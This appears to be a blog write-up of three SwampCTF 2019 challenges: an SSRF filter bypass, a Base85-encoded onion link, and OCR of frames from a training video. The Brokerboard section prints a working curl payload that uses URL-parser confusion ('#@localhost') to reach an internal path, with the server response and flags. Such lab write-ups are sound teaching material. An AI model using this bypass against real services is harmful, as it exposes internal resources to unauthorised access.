SwampCTF 2019

Brokerboard [50]

Problem Description

It’s the year 1997 and the Internet is just heating up! :fire:

In order to get ahead of the curve, SIT Industries® has introduced it’s first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far to hire Kernel Sanders® to test the security!

However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil’ parse_url magic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!

… or have they? :wink:


-= Created by andrewjkerr =-


After connecting to the website of the challenge, we obtain the following page:


There was an input field in the page allowing us to send a request to the URL we wanted.

After some tries I noticed that the only accepted URL was www.google.com. Taking this into account, I tried injecting http://google.com#@localhost/key.

$ curl http://chal1.swampctf.com:1244/ --data="link=http://google.com#@localhost/key"

    <title>Link Fetcher</title>
    <h1>The Link Fetcher</h1>
    <p>Want to remember cool links? This link fetcher will fetch links and store them for you!</p>
    <form action="/" method="POST">
        <input type="text" name="link" />
        <input type="submit" />

    <p>Link added!</p><p>Link: http://google.com#@localhost/key</p><p>Title: The flag!</p><p>Description: flag{y0u_cANn0t_TRU5t_php}</p><hr /></body>

Flag: flag{y0u_cANn0t_TRU5t_php}

NIT [128]

Problem Description

The network investigative technique had just triggered and we were starting receive telemetry when, suddenly, a pop-up asked him for administrative access. He freaked out and yanked his cable leaving us with a copious amount of line noise. We’ve been tracking this guy for a while and really need a win here.

See if you can get anything out of this mess:


-= Created by v0ldemort =-


We received a ciphered/encoded string, “A7]^gF*(u(BkVO)1MV#U/oPWADf.4LBQ&)IE+j2TD.GLe2e4XS@q%-(3+b!&3+=g#AMcDXAMuMZ@:V/M2e4jY”. After trying to decipher it using many Cipher algorithms, I found the solution. It was encoded using Base85:

I used CyberChef to decode the string obtaining an onion link depastedihrn3jtw.onion/show.php?md5=7d1ecb0f8f428b70e49de68ead337d7e:


This link shows the following information in the comments:


The comment with “flag = fecabed47e50e3a2b615e86d0e0f1c59” suggested me to visit the following onion link depastedihrn3jtw.onion/show.php?md5=fecabed47e50e3a2b615e86d0e0f1c59, which finally shows the flag:


Flag: flag{sp00ky_W3bz_L0L}

Ghidra Release [310]

Problem Description

[Meanwhile at the NSA on a Friday afternoon]

Manager: Hey, we’re going to be releasing our internal video training for Ghidra and we need you to watch it all to flag any content that needs to be redacted before release.

Manager: The release is next Monday. Hope you didn’t have any weekend plans!

You: Uhhh, sure bu-

Manager: Great! Thanks. Make sure nothing gets out.

You: … [looks at clock. It reads 3:45PM]

You: [Mutters to self] No way am I watching all of this: https://static.swampctf.com/ghidra_nsa_training.mp4

-= Created by DigitalCold =-


I downloaded the video from the provided link.

After having it downloaded, I extracted 1 frame for each second of video using the ffmpeg tool.

$ ffmpeg -i ghidra_nsa_training.mp4 -vf "fps=1" out%0d.png

Once having all the frames extracted, I used tesseract, an OCR engine to extract text from images to analyze all the frames previously extracted. The simple bash script I prepare for that:

for file in $(ls . | grep png); do
	echo "image:${file}";
	tesseract $file - | grep -i flag

I obtained the first part of the flag in the image out12175.png, as shown in the following image:


The next part of the flag was obtained in the image out26715.png:


All the parts of the flag were:

  • FLAG(1/4): flag{l34
  • FLAG(2/4): kfr33_n4
  • FLAG(3/4): tion4l_s
  • FLAG(4/4): 3cur1ty}

Flag: flag{l34kfr33_n4tion4l_s3cur1ty}

Written on April 8, 2019